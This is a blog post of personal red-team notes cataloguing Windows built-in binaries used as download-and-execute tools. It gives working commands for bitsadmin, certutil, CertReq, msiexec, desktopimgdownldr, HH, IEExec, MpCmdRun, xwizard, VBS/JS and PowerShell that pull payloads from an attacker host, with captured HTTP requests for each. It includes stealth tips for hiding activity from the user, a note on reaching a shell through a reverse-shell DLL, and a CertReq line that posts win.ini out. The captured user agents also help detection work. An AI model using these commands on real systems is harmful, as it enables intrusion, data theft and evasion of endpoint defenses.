SteveDevin ACM ACG CS CV Security

Living Off The Land

2020-11-25
SteveDevin

最近做白利用改进专项, 记录一下

Downloader

1. Bitsadmin.exe

bitsadmin /create myfile
bitsadmin /addfile myfile http://192.168.220.125/white_process/call_calc.exe c:\data\playfolder\notepad.exe
bitsadmin /SetNotifyCmdLine myfile c:\ADS\1.txt:cmd.exe NULL
bitsadmin /RESUME myfile

或参考 Micro8 的方法

bitsadmin /rawreturn /transfer down "http://192.168.1.115/robots.txt" E:\PDF\robots.txt

pcap

GET /white_process/call_calc.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Wed, 25 Nov 2020 16:46:48 GMT
Range: bytes=0-71744
User-Agent: Microsoft BITS/7.8
Host: 192.168.220.125

2. CertReq.exe

CertReq -Post -config https://example.org/ c:\windows\win.ini

pcap

POST /white_process/test HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/json
User-Agent: Mozilla/4.0 (compatible; Win32; NDES client 10.0.18362.1/19h1_release)
Content-Length: 167
Host: 192.168.220.125

Note: Small files only

Due to something going on with the internals of CertReq.exe only small (not sure on specific size limitations) files appear to work - otherwise you get the below error!

3. Certutil.exe

certutil.exe -urlcache -split -f http://192.168.220.125/white_process/test.msi

pcap

GET /white_process/test.msi HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: 192.168.220.125

Note 也有人遇到UA为 CertUtil URL Agent 的情况

4. Desktopimgdownldr.exe

desktopimgdownldr.exe /lockscreenurl:http://192.168.220.125/white_process/call_calc.exe /eventName:hello

pcap

GET /white_process/call_calc.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Wed, 25 Nov 2020 16:46:48 GMT
User-Agent: Microsoft BITS/7.8
Host: 192.168.220.125

Note.1 When used for its intended purpose, it downloads and saves images to the following default path:

C:\windows\Personalization\LockScreenImage\LockScreenImage_%random%.jpg

Note.2 The system uses BITS to download Windows updates and Microsoft Defender updates, among other things.

Tips

When running as Administrator, the binary sets and overrides the user’s lock screen image. However, as I show further below, by deleting the registry right after running the binary, the override can be avoided. In addition, desktopimgdownldr.exe does not change the image while the computer is in a locked screen, so an attacker can run it without the user noticing at all.

5. Msiexec.exe

bmsiexec /i http://192.168.220.125/white_process/test.msi

pcap

GET /white_process/test.msi HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Windows Installer
Host: 192.168.220.125

Note whitch function Msiexec.exe call: DllRegisterServer 之前按照 Micro8 的过程复现, 发现一直有问题, 后来wsy提醒说, Msiexec 调用的dll的 DllRegisterServer, 而Micro8中的方法生成的dll导出表仅有 DllEntryPoint

后面逆向了一下 32位版的 msiexec.exe, 也通过 rundll32 Msiexec_rev_x64_4444.dll DllEntryPoint 成功 get shell 证实了这一结论

msiexec_re_register_dll

6. HH

Open the target PowerShell script with HTML Help.

HH.exe http://192.168.220.125/white_process/call_calc.exe

pcap

GET /white_process/call_calc.exe HTTP/1.1
Accept: */*
Accept-Language: zh-CN
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: 192.168.220.125
Connection: Keep-Alive

Note 下载后会直接打开, 目前没有找到能做隐藏的参数

7. IEExec Microsoft IE Execute shell

download and execute files from remote server

C:\Users\test\Desktop>c:\Windows\Microsoft.NET\Framework\v2.0.50727\IEExec.exe http://192.168.220.125/white_process/call_calc.exe

pcap

GET /white_process/call_calc.exe HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: 192.168.220.125
Connection: Keep-Alive

Note IEExec 在 .net 目录下, 需要找一下

8. MpCmdRun

"c:\Program Files\Windows Defender\MpCmdRun.exe" -DownloadFile -url http://192.168.220.125/white_progress/test -path c:\test.exe

Note

根据下面 reference 的说法, MpCmdRun 在 4.18.2008.9 版本中引入了 -DownloadFile 参数, 然而手里没有这个版本的环境, 只有一个4.18.2010.7的有这个参数

但是, 对于这个版本的windows defender, 直接把通过 MpCmdRun 下载的行为视为危险行为, 行为加白或关掉实时防护, 直接报参数错误

如果这是微软及时封堵的结果, 那可利用的价值和情况就不大了. 目前先挖个坑(无底坑), 后面遇到4.18.2008.9版本的windows defender再做测试

Windows_defender-MpCmdRun

9. Xwizard

C:\Users\test\Desktop>xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /z http://192.168.220.125/white_process/test.msi

pcap

GET /white_process/test.msi HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: 192.168.220.125
Connection: Keep-Alive

Note 虽然可以下载成功, 但是执行的时候, 会报 客户端配置文件无效, 挖坑

10. Cscript

set a=createobject("adod"+"b.stream"):set w=createobject("micro"+"soft.xmlhttp"):w.open"get",wsh.arguments( 0),0:w.send:
a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2
cscript downfile.vbs http://192.168.220.125/white_process/test test.txt

pcap

GET /white_process/test HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: 192.168.220.125
Connection: Keep-Alive

11. JS

var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
WScript.Echo(WinHttpReq.ResponseText);
cscript /nologo downfile.js http://192.168.220.125/white_process/test.msi

pcap

GET /white_process/test.msi HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: 192.168.220.125

12. Powershell-wget/curl

较新版本powershell中, 添加了 curl/wget 的实现, 但是两者所用ua仍为 powershell

powershell /c wget http://xxxxxx.xxxx.xx
powershell /c curl http://xxxxxx.xxxx.xx

pcap

GET /white_process/call_calc.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; zh-CN) WindowsPowerShell/5.1.17763.316
Host: 192.168.220.125
Connection: Keep-Alive

Reference

downloader

certreq

certutil

Msiexec

desktopimgdownldr

MpCmdRun


Similar Posts

上一篇 CS cna

下一篇 ToDo List

Comments